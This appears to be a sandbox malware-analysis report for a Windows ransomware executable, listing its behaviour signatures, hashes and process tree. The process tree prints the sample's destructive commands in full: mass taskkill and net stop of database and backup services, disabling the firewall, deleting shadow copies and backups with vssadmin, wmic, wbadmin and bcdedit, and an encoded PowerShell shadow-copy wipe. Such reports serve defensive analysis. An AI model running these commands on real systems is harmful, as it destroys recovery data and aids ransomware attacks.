Analysis
-
max time kernel
110s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-07-2021 17:10
General
-
Target
1069-cc87764d70827118862689d1630efc72547f97aa.exe
-
Size
3.2MB
-
MD5
f17e50158a1faf71deb3a6e8b4f3271f
-
SHA1
cc87764d70827118862689d1630efc72547f97aa
-
SHA256
99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
-
SHA512
e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 14 IoCs
-
Modifies Control Panel 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 17 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"1⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.41⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\Please Read ME!!!.logMD5
81051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
memory/680-125-0x0000000000000000-mapping.dmp
-
memory/748-124-0x0000000000000000-mapping.dmp
-
memory/1280-182-0x0000000000000000-mapping.dmp
-
memory/1536-114-0x0000000000000000-mapping.dmp
-
memory/1568-127-0x0000000000000000-mapping.dmp
-
memory/1580-178-0x0000000000000000-mapping.dmp
-
memory/1968-177-0x0000000000000000-mapping.dmp
-
memory/2132-185-0x0000000000000000-mapping.dmp
-
memory/2172-115-0x0000000000000000-mapping.dmp
-
memory/2184-122-0x0000000000840000-0x000000000098A000-memory.dmpFilesize
1.3MB
-
memory/2320-126-0x0000000000000000-mapping.dmp
-
memory/2320-186-0x0000000000000000-mapping.dmp
-
memory/2344-116-0x0000000000000000-mapping.dmp
-
memory/2456-180-0x0000000000000000-mapping.dmp
-
memory/2472-117-0x0000000000000000-mapping.dmp
-
memory/2488-192-0x0000000008AA0000-0x0000000008AA1000-memory.dmpFilesize
4KB
-
memory/2488-154-0x0000000007AB0000-0x0000000007AB1000-memory.dmpFilesize
4KB
-
memory/2488-134-0x0000000000E70000-0x0000000000E71000-memory.dmpFilesize
4KB
-
memory/2488-135-0x0000000006DD0000-0x0000000006DD1000-memory.dmpFilesize
4KB
-
memory/2488-130-0x0000000000000000-mapping.dmp
-
memory/2488-159-0x0000000007D80000-0x0000000007D81000-memory.dmpFilesize
4KB
-
memory/2488-155-0x0000000008000000-0x0000000008001000-memory.dmpFilesize
4KB
-
memory/2488-201-0x0000000000DD3000-0x0000000000DD4000-memory.dmpFilesize
4KB
-
memory/2488-191-0x0000000008B40000-0x0000000008B41000-memory.dmpFilesize
4KB
-
memory/2488-141-0x0000000006BF0000-0x0000000006BF1000-memory.dmpFilesize
4KB
-
memory/2488-142-0x0000000000DD0000-0x0000000000DD1000-memory.dmpFilesize
4KB
-
memory/2488-143-0x0000000000DD2000-0x0000000000DD3000-memory.dmpFilesize
4KB
-
memory/2488-144-0x00000000075E0000-0x00000000075E1000-memory.dmpFilesize
4KB
-
memory/2488-194-0x0000000009380000-0x0000000009381000-memory.dmpFilesize
4KB
-
memory/2488-146-0x0000000007650000-0x0000000007651000-memory.dmpFilesize
4KB
-
memory/2488-193-0x0000000008AF0000-0x0000000008AF1000-memory.dmpFilesize
4KB
-
memory/2488-148-0x00000000076E0000-0x00000000076E1000-memory.dmpFilesize
4KB
-
memory/2804-118-0x0000000000000000-mapping.dmp
-
memory/2912-119-0x0000000000000000-mapping.dmp
-
memory/3460-187-0x0000000000000000-mapping.dmp
-
memory/3508-184-0x0000000000000000-mapping.dmp
-
memory/3548-196-0x0000000000000000-mapping.dmp
-
memory/3672-120-0x0000000000000000-mapping.dmp
-
memory/3684-123-0x0000000000000000-mapping.dmp
-
memory/3764-121-0x0000000000000000-mapping.dmp
-
memory/3860-128-0x0000000000000000-mapping.dmp
-
memory/3936-129-0x0000000000000000-mapping.dmp
-
memory/3948-179-0x0000000000000000-mapping.dmp
-
memory/4052-131-0x0000000000000000-mapping.dmp
-
memory/4100-183-0x0000000000000000-mapping.dmp
-
memory/4200-136-0x0000000000000000-mapping.dmp
-
memory/4208-137-0x0000000000000000-mapping.dmp
-
memory/4224-181-0x0000000000000000-mapping.dmp
-
memory/4236-138-0x0000000000000000-mapping.dmp
-
memory/4240-188-0x0000000000000000-mapping.dmp
-
memory/4248-195-0x0000000000000000-mapping.dmp
-
memory/4260-197-0x0000000000000000-mapping.dmp
-
memory/4300-139-0x0000000000000000-mapping.dmp
-
memory/4348-140-0x0000000000000000-mapping.dmp
-
memory/4416-145-0x0000000000000000-mapping.dmp
-
memory/4452-147-0x0000000000000000-mapping.dmp
-
memory/4520-149-0x0000000000000000-mapping.dmp
-
memory/4552-150-0x0000000000000000-mapping.dmp
-
memory/4564-151-0x0000000000000000-mapping.dmp
-
memory/4612-152-0x0000000000000000-mapping.dmp
-
memory/4632-153-0x0000000000000000-mapping.dmp
-
memory/4680-156-0x0000000000000000-mapping.dmp
-
memory/4712-157-0x0000000000000000-mapping.dmp
-
memory/4736-158-0x0000000000000000-mapping.dmp
-
memory/4768-160-0x0000000000000000-mapping.dmp
-
memory/4788-161-0x0000000000000000-mapping.dmp
-
memory/4808-162-0x0000000000000000-mapping.dmp
-
memory/4840-163-0x0000000000000000-mapping.dmp
-
memory/4860-164-0x0000000000000000-mapping.dmp
-
memory/4884-165-0x0000000000000000-mapping.dmp
-
memory/4900-166-0x0000000000000000-mapping.dmp
-
memory/4912-167-0x0000000000000000-mapping.dmp
-
memory/4956-168-0x0000000000000000-mapping.dmp
-
memory/4976-169-0x0000000000000000-mapping.dmp
-
memory/4996-170-0x0000000000000000-mapping.dmp
-
memory/5016-171-0x0000000000000000-mapping.dmp
-
memory/5036-172-0x0000000000000000-mapping.dmp
-
memory/5068-173-0x0000000000000000-mapping.dmp
-
memory/5092-175-0x0000000000000000-mapping.dmp